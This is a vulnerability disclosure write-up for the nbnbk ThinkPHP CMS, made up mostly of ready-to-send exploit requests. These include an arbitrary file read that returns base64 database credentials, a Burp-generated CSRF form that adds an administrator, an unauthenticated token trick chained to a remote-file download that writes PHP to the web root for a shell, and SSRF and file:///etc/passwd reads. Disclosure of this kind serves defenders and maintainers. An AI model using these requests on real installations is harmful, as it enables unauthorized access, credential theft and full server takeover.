fanli2012 / nbnbk
A thinkphp5-based CMS management system and open-source B2C PHP e-commerce platform: tp5 open-source CMS and ThinkPHP enterprise website source code, suitable for secondary development of blogs and small and medium-sized business sites.
License: Other
Nbnbk has an arbitrary file read vulnerability
POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
url=../application/database.php
Read the file by modifying the url parameter, then look at the returned data.
HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8
{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\r\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\r\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\r\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\r\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\r\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\r\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\r\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\r\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\r\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\r\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\r\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\/nuaOpWRzbgogICAgJ2Rz\r\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\/nuaOpeWPguaVsAogICAgJ3Bh\r\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\r\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\r\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\r\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\r\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\r\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\r\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICA
gJ3J3X3NlcGFyYXRlJyAgICA9PiBm\r\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\r\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\r\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\r\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\r\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\r\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\r\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\r\ngOimgei\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\r\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\r\nIGZhbHNlLApdOwo=\r\n"}
The file content is in the data field, base64-encoded, but it contains a large number of \r\n sequences which prevent us from decoding it directly. We can strip all of the \r\n with JavaScript.
const a = "$data string";                 // paste the value of the data field here
const cleaned = a.replaceAll('\r\n', ''); // strip every CRLF so the base64 can be decoded
Demonstration of transforming the data above with that snippet.
Then base64-decode the transformed data; I used the Google Chrome extension FeHelper.
CSRF Add Background User in nbnbk
This vulnerability allows an administrator account to be added via CSRF, without knowing the administrator credentials or logging into the backend, and without leaving a trace.
Affected versions: default
Specific implementation
http://nbnbk:8888/fladmin/login
Open the /fladmin/login path to reach the backend login page.
Log in to the backend with the default credentials admin888/123456, then find the "Add administrator" function on the "Administrator" page under the user management list.
Enter any username and password and click Save.
View the request packet in Burp (bp) and have Burp generate the CSRF PoC code.
Copy it into a new local file and serve it with python -m http.server 8099 to start a local web server.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://nbnbk:8888/fladmin/admin/add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="pwd" value="123456" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Click "Submit request" to send the request.
After clicking, a message reports that the administrator was added successfully.
Look at our request packet.
Origin and Referer point to our own server. This concludes the CSRF add-administrator report.
Nbnbk has an arbitrary file upload (getshell) vulnerability
This vulnerability allows arbitrary file upload and a getshell without any account or password; two requests are enough to obtain control of the machine.
Affected versions: default
Get token
The file upload interface requires an access_token, which can be obtained from the following interface.
POST /api/login/wx_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close
openid=1&unionid=1&sex=1&head_img=1&nickname=1
The response shows that the token has already been generated.
HTTP/1.1 200 OK
Date: Wed, 02 Mar 2022 01:37:25 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 831
Connection: close
Content-Type: text/html; charset=UTF-8
{"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
Start an HTTP service on the VPS
echo '<?php phpinfo();' > index.php
python -m http.server 8099
File Upload
POST /api/User/download_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
access_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php
The access_token here is the token obtained above; url is the address of the file and path is the file name.
A 200 response means success; visiting http://nbnbk:8888/info.php directly shows that the file has been written and is parsed successfully.
Vulnerability Analysis
Discovering the dangerous function
A global search for fopen, the file-opening function, turned up a path under api that is controlled by a variable, which is very likely to be a problem.
Double-clicking shows it is a function named download_img, in which the url and path variables are controllable.
Here curl is used directly to fetch the url we supply, and path is not filtered at all: the file is read and written straight into the specified directory.
Constructing the request directly returns a token error, so the next step is to obtain a token.
Get token
From the source we can see that getToken can only be called after logging in. A token can be obtained by registering and logging in, but if registration is disabled or broken we cannot get a token that way. Is there a way to get a token without an account and password?
Looking further at the login functionality in Login.php, we find that it provides a login method that does not require an account or password.
Following the wxLogin function further
1. The folded part of the function contains a check of the input, which roughly means that if the user does not exist a new one is created; we can ignore it here.
2. After the check passes, a new token is generated.
We construct the packet directly, fill in the required fields, and get the generated token. That concludes the analysis.
SSRF vulnerability in nbnbk
This vulnerability makes the server send requests on the attacker's behalf, but the response is not echoed back, so the impact is small; it could be used for DDoS.
Affected versions: default
POST /api/Image/curl_upload_image HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
url=http://127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1
Replace the url to carry out the SSRF attack; the vulnerability has no echo. After sending the request you can see that the server has made the outbound request.
A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
Vulnerable code in /application/api/controller/Index.php
/**
 * Convert a file to a Base64 binary stream
 * @param $url network file path, absolute address
 * @return string
 */
public function getFileBinary()
{
    // no scheme or host check: file://, http://127.0.0.1 and any other URL are accepted as-is
    $str = file_get_contents($_REQUEST['url']);
    Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
}
Vulnerability PoC
GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close
The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.
A remote attacker can also read arbitrary file information from the target system.
PoC
GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close
After base64-decoding the data field of the HTTP response body, you get the content of the file (/etc/passwd).